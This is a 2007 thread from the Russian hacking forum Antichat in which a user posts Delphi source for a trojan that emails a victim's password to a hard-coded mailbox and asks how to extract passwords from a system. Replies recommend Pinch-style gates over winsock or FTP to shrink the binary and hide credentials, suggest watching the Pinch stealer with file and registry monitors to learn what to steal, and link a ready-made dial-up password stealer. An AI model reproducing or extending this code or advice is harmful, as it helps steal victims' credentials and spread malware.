Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   Dial-up + Trojan + Delphi (https://forum.antichat.xyz/showthread.php?t=39367)

Woldemar 02.05.2007 07:03
Dial-up + Trojan + Delphi
 
Доброго дня,

с кооперируемся и поможем мне :)

смотрите что есть :
PHP код:
procedure TForm2.btn1Click(SenderTObject);
var
  msgTIdMessage;
begin
  Memo1.Clear;
  if (cbb1.Text '') or (edt1.Text ''then
    Exit;
  btn1.Enabled:= False;
  btn2.Enabled:= False;
  IdSMTP1.UserId:= 'имя@mail.ru';
  IdSMTP1.Password:= 'пароль'
  IdSMTP1.Host:= 'smtp.mail.ru';
  IdSMTP1.AuthenticationType:= atLogin;
  msg:= TIdMessage.Create(IdSMTP1);
  msg.Subject:= 'Что то жертвы: ' cbb1.Text;
  msg.Recipients.EMailAddresses:= 'кому@rambler.ru';
  msg.From.Address:= 'откого@mail.ru';
  Memo1.Lines.Add('|=====================|');
  Memo1.Lines.Add('     Чтото жертвы: ' cbb1.Text);
  Memo1.Lines.Add('     Пароль Жертвы: ' edt1.Text);
  memo1.Lines.Add('|=====================|');
  msg.Body.Text:= Memo1.Text;
{  dialup.login:= ;
  dialup.Password:= '';
  try
   dialup.Login(0);
  except
    Exit;
  end; }
  try
    IdSMTP1.Connect(); //Ñîåäèíåíèå
    IdSMTP1.Send(msg);  //Îòïðàâêà
    Exit;
  finally
    IdSMTP1.Disconnect;  //Îòêëþ÷åíèå
    btn1.Enabled:= False;
    btn2.Enabled:= False;
  end;
end
Вопрос:

Каким образом можно вытягивать пароли из системы?
Сложно будет кому то впарить такое но все же нужно!

slesh 02.05.2007 11:20
Мне кажется что с мылом - чуток туповато. Т.к. простой дикомпил этого создания покажет куда что шлется и с каким паролем. И этот потовый ящик может поиметь любой с более менее ровными руками. Да к томуже и размер будет, даже если сжать UPX'ом, порядком более 200 килобайт!
Мой тебе совет: для отправки данных лучше юзай типа гейта от пинча. Во первых - никаких паролей которые можно спереть, а во вторых можно напрямую через winsock всё сделать без всяких VCL и тогда размер будет в пределах 40 килобайт. А если убраль лишние модули и заменить их своими(типа sysutils) то размер можно получить порядка 20 килобайт.
-----------
А на счет паролей - погляди что делает пинч. К примеру поставь файловый монитор и монитор реестра и запусти пинч и увидешь к чему он лезит. А там дела техники. Вобщем разобраться с можешь быстро что и откуда нужно тырить!

Woldemar 02.05.2007 11:58
Ok! Погляжу

ProTeuS 02.05.2007 14:29
оппа, это ж сорцы моего приватного троя, откуда они у тебя?

slesh 02.05.2007 15:07
2 ProTeuS :-D :-D

Woldemar 02.05.2007 15:52
Цитата:
Сообщение от ProTeuS
оппа, это ж сорцы моего приватного троя, откуда они у тебя?
Сорцы не сорсы лучша помоги братьям по разуму ЫЫ :D

Nix* 02.05.2007 18:18
Цитата:
IdSMTP1.UserId:= 'имя@mail.ru';
IdSMTP1.Password:= 'пароль';
IdSMTP1.Host:= 'smtp.mail.ru';
Лучше фтп...
Поставь гейт от Nuklaer.(Только немного измени его)

W!z@rD 04.05.2007 06:57
вот держи...
Прога написанна на API... так что проблемы с 200 кб отпадают )))
1. Ворует Dual-UP пассы.
2. Отправляет на указанное мыло которое прошито в теле проги!!! Так что предется перекомпилировать )

www.tcpv.narod.ru/DialRIP.7z

Woldemar 04.05.2007 09:33
Спасибо всем :)


Время: 23:39